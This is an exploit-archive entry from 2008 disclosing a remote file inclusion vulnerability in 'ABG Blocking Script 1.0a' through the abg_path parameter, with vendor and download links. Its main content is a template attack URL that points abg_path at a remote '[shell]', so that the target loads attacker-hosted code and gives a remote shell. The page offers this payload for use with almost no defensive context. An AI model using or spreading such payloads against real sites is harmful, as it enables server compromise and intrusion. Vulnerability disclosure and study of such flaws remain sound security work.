[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ABG Blocking Script 1.0a (abg_path) Remote File Inclusion Vulnerability
# Published : 2008-08-01
# Author : Lo$er
# Previous Title : PHPAuction GPL Enhanced 2.51 (profile.php) SQL Injection Vulnerability
# Next Title : E-topbiz Dating 3 PHP Script (mail_id) Remote SQL Injection Vulnerability
=================================================================
========Africa Be Gone version 1.0a Remote File Inclusion========
=================================================================
Vendor: http://www.africabegone.com
Download: http://www.africabegone.com/includes/downloads/index.php?file=1&sort=1
Discovered: 7-31-08
Discovered By: Lo$er
====Vulnerable code====
$abg_path is initilizied but overwritten later down the road.
====RFI====
http://www.[site].com/[abg path]/index.php?abg_path=[shell]?
# www.Syue.com [2008-08-01]